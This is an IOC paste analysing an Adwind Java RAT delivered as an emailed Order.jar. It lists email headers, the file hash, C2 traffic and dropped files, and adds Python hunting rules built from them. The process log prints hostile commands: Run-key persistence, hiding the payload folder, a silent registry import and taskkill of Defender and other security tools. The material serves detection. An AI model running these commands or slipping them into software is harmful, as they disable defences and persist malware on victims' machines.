#IOC #OptiData #VR #Adwind #Java #JAR #JRE
https://pastebin.com/BqbDN6Sr
FAQ:
https://radetskiy.wordpress.com/2018/05/11/ioc_adwind_100518/

attack_vector
--------------
email attach .JAR > WSH > JRE > AppData\Roaming\*.jar + *.vbs

email_headers
--------------
Received: from gunimo.com ([167.99.137.237])
by srv8.victim1.com for <user0@org7.victim1.com>;
Wed, 26 Dec 2018 12:24:21 +0200 (EET)
(envelope-from tony.turner@stoneacre.co.uk)
Received: from [102.165.33.14]
by gunimo.com with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:256)
(Exim 4.84_2) (envelope-from <tony.turner@stoneacre.co.uk>)
id 1gZrOo-0001md-CS; Thu, 20 Dec 2018 06:01:44 +0000
Subject: Order
To: Recipients <tony.turner@stoneacre.co.uk>
From: "Tony" <tony.turner@stoneacre.co.uk>

files
--------------
SHA-256 b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11
File name Order.jar
File size 634.28 KB

activity
**************
JAR > JRE > WSH > JRE > collect system info & open remote connection

netwrk
--------------
185.183.97.184 goz.unknowncrypter{.}com:7789 POST /is-ready HTTP/1.1
AC38D1C7<|>APM11<|>operator<|>Microsoft Windows 7 ... <|>plus<|>nan-av<|>false - 26.12.2018

comp
--------------
java.exe 2628 TCP 127.0.0.1 7777 SYN_SENT
wscript.exe 2104 TCP 185.183.97.184 7789 ESTABLISHED
javaw.exe 976 TCP 185.244.30.121 4379 SYN_SENT

proc
--------------
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\Desktop\Order.jar"
C:\Windows\system32\wscript.exe C:\Users\operator\ufcgwhauov.vbs
"C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version 2> C:\tmp\output.txt
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
"C:\Program Files\Java\jre1.8.0_191\bin\java.exe" -jar C:\tmp\_0.90765668489300629104286604121415413.class
C:\Windows\system32\cmd.exe
C:\tmp\Retrive275305157297834866.vbs
C:\tmp\Retrive3342971358066659593.vbs
C:\tmp\Retrive5146022430127275435.vbs
C:\tmp\Retrive118764366264415957.vbs
C:\Windows\system32\xcopy.exe "C:\Program Files\Java\jre1.8.0_191" "C:\Users\operator\AppData\Roaming\Oracle\" /e
C:\Windows\system32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v zaRukQhXbGj /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI\"" /f
C:\Windows\system32\attrib.exe attrib +h "C:\Users\operator\TpTuKAZzLlb\*.*"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.58402873485980682215056483974766042.class
C:\Windows\system32\cmd.exe
C:\tmp\Retrive3841406484415973045.vbs
C:\tmp\Retrive4727136555263513640.vbs
C:\tmp\Retrive7570843625298647226.vbs
C:\tmp\Retrive8366581331663954177.vbs
C:\Windows\system32\taskkill.exe /IM ProcessHacker.exe /T /F
C:\Windows\system32\cmd.exe /c regedit.exe /s C:\tmp\CEBqbLoDPx3000572971971620291.reg
C:\Windows\system32\taskkill.exe
taskkill /IM MSASCui.exe /T /F
taskkill /IM MsMpEng.exe /T /F
taskkill /IM MpUXSrv.exe /T /F
taskkill /IM MpCmdRun.exe /T /F
taskkill /IM NisSrv.exe /T /F
taskkill /IM ConfigSecurityPolicy.exe /T /F
taskkill /IM procexp.exe /T /F
taskkill /IM wireshark.exe /T /F
...
taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
taskkill /IM twsscan.exe /T /F
taskkill /IM UserReg.exe /T /F

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26.12.2018 17:38
@dVvzehDtJK
c:\users\operator\appdata\roaming\dvvzehdtjk.vbs 26.12.2018 17:38
wscript.exe //B "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
@ntfsmgr Java(TM) Platform SE binary Oracle Corporation
c:\program files\java\jre1.8.0_191\bin\javaw.exe 06.10.2018 18:42
"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
@zaRukQhXbGj Java(TM) Platform SE binary Oracle Corporation
c:\users\operator\appdata\roaming\oracle\bin\javaw.exe 06.10.2018 18:42
"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI"
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 26.12.2018 17:38
@dVvzehDtJK.vbs
c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\dvvzehdtjk.vbs 26.12.2018 17:38
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dVvzehDtJK.vbs
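Added example, not part of the original paste or the analyst's tooling: Python hunting logic that turns the behaviours visible in the proc, persist and netwrk sections into rules over process command lines (JRE copied into AppData\Roaming\Oracle and run from there, -jar payloads under the user profile with a non-.jar extension, Run-key persistence through javaw.exe, WSH launching .vbs from the profile, silent .reg import, taskkill of security tools) plus a parser for the <|>-delimited /is-ready check-in body. The sample events are the command lines recorded above plus one constructed benign Java launch; the check-in body is reconstructed from the observed fields with the elided OS string shortened, and its field labels are an assumption (the paste only shows positions). The KILLED_TOOLS set covers only the names visible above, since the paste truncates the list.

```python
"""Hunting rules for the Adwind chain documented in this paste.

Example code added for this page, not the dropper's or the analyst's own
tooling.  Rules are derived from the proc/persist/netwrk observations; sample
events are the command lines quoted in the paste plus one constructed benign
line.
"""
import re
from typing import Optional, Set, Tuple

# Tools the dropper terminates with "taskkill /IM <name> /T /F".  The paste
# truncates the list with "...", so this is only the visible subset.
KILLED_TOOLS = {
    "processhacker.exe", "msascui.exe", "msmpeng.exe", "mpuxsrv.exe",
    "mpcmdrun.exe", "nissrv.exe", "configsecuritypolicy.exe", "procexp.exe",
    "wireshark.exe", "forticlient_diagnostic_tool.exe", "twsscan.exe",
    "userreg.exe",
}
USER_PROFILE = re.compile(r"c:\\users\\[^\\]+\\", re.I)   # path under a user profile
RUN_KEY = re.compile(r"\\currentversion\\run\b", re.I)     # ...\CurrentVersion\Run


def split_image(cmdline: str) -> Tuple[str, str]:
    """Split a Windows command line into (image path, argument string)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest


def jar_argument(args: str) -> Optional[str]:
    """Return the unquoted path passed after -jar, or None."""
    m = re.search(r'-jar\s+"?([^"]+?)"?\s*$', args, re.I)
    return m.group(1) if m else None


def classify_cmdline(cmdline: str) -> Set[str]:
    """Return the set of Adwind-style behaviours one command line exhibits."""
    image, args = split_image(cmdline)
    exe = image.lower().rsplit("\\", 1)[-1]
    low = cmdline.lower()
    tags: Set[str] = set()
    if exe in ("java.exe", "javaw.exe"):
        if USER_PROFILE.search(image):             # xcopy'd JRE in AppData\Roaming\Oracle
            tags.add("java_runtime_outside_program_files")
        jar = jar_argument(args)
        if jar:
            if USER_PROFILE.search(jar):           # Order.jar, ntfsmgr.jar, random-dir payload
                tags.add("jar_launched_from_user_profile")
            if not jar.lower().endswith(".jar"):   # .class / .uJjalI passed to -jar
                tags.add("jar_with_masked_extension")
    elif exe in ("wscript.exe", "cscript.exe"):
        if ".vbs" in args.lower() and USER_PROFILE.search(args):
            tags.add("wsh_vbs_from_user_profile")
    elif exe == "xcopy.exe":
        if "\\java\\jre" in low and "\\appdata\\" in low:
            tags.add("jre_copied_to_appdata")
    elif exe == "reg.exe":
        if args.lower().startswith("add ") and RUN_KEY.search(args) \
                and "javaw.exe" in low and "-jar" in low:
            tags.add("run_key_java_persistence")
    elif exe == "attrib.exe":
        if "+h" in args and USER_PROFILE.search(args):
            tags.add("hides_payload_dir")
    elif exe in ("taskkill.exe", "taskkill"):
        m = re.search(r"/im\s+(\S+)", args, re.I)
        if m and m.group(1).lower() in KILLED_TOOLS:
            tags.add("kills_security_tool")
    elif exe == "cmd.exe":
        if "regedit" in low and " /s " in low and ".reg" in low:
            tags.add("silent_reg_import")
        if "-version" in low and "2>" in low:      # dropper probes the installed JRE
            tags.add("jre_version_probe")
    return tags


def hunt(cmdlines):
    """Map every command line that trips at least one rule to its tags."""
    return {c: classify_cmdline(c) for c in cmdlines if classify_cmdline(c)}


# /is-ready body: "<|>"-delimited record.  Only the user and OS positions are
# evident from the sample; the other labels are assumed for readability.
CHECKIN_FIELDS = ("host_id", "tag", "user", "os", "edition", "av", "flag")


def parse_checkin(body: str) -> dict:
    return dict(zip(CHECKIN_FIELDS, body.split("<|>")))


def is_checkin(request_line: str, body: str) -> bool:
    """POST /is-ready with a <|>-delimited body is the observed beacon shape."""
    return request_line.startswith("POST /is-ready") and body.count("<|>") >= 3


# Sample events: command lines from the proc section; the last one is a
# constructed benign launch of a jar installed under Program Files.
SAMPLE_PROCESSES = [
    r'"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\Desktop\Order.jar"',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"',
    r'"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version 2> C:\tmp\output.txt',
    r'"C:\Program Files\Java\jre1.8.0_191\bin\java.exe" -jar C:\tmp\_0.90765668489300629104286604121415413.class',
    r'C:\Windows\system32\xcopy.exe "C:\Program Files\Java\jre1.8.0_191" "C:\Users\operator\AppData\Roaming\Oracle\" /e',
    r'C:\Windows\system32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v zaRukQhXbGj /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI\"" /f',
    r'C:\Windows\system32\attrib.exe attrib +h "C:\Users\operator\TpTuKAZzLlb\*.*"',
    r'C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI',
    r'taskkill /IM MsMpEng.exe /T /F',
    r'C:\Windows\system32\cmd.exe /c regedit.exe /s C:\tmp\CEBqbLoDPx3000572971971620291.reg',
    r'"C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Program Files\ExampleVendor\app.jar"',
]
# Constructed from the observed check-in; the OS string is shortened.
SAMPLE_CHECKIN = "AC38D1C7<|>APM11<|>operator<|>Microsoft Windows 7<|>plus<|>nan-av<|>false"

if __name__ == "__main__":
    for line, tags in hunt(SAMPLE_PROCESSES).items():
        print(sorted(tags), line)
    print(parse_checkin(SAMPLE_CHECKIN))
```

The rules key on where Java and its payload live rather than on the random file names, so the renamed .vbs/.jar/.uJjalI artefacts from the drop section do not matter; a legitimate launch of a jar under Program Files trips nothing.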

drop
--------------
C:\Users\operator\ufcgwhauov.vbs
C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs
C:\tmp\output.txt
C:\Users\operator\AppData\Roaming\ntfsmgr.jar
C:\tmp\_0.90765668489300629104286604121415413.class
C:\tmp\Retrive275305157297834866.vbs
C:\tmp\Retrive3342971358066659593.vbs
C:\tmp\Retrive5146022430127275435.vbs
C:\tmp\Retrive118764366264415957.vbs
C:\Users\operator\AppData\Roaming\Oracle\
C:\Users\operator\TpTuKAZzLlb\
C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
C:\Users\operator\fUTkALeaTxM\
C:\tmp\_0.58402873485980682215056483974766042.class
C:\tmp\Retrive3841406484415973045.vbs
C:\tmp\Retrive4727136555263513640.vbs
C:\tmp\Retrive7570843625298647226.vbs
C:\tmp\Retrive8366581331663954177.vbs
C:\tmp\CEBqbLoDPx3000572971971620291.reg

VR
# # #
https://www.virustotal.com/#/file/b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11/details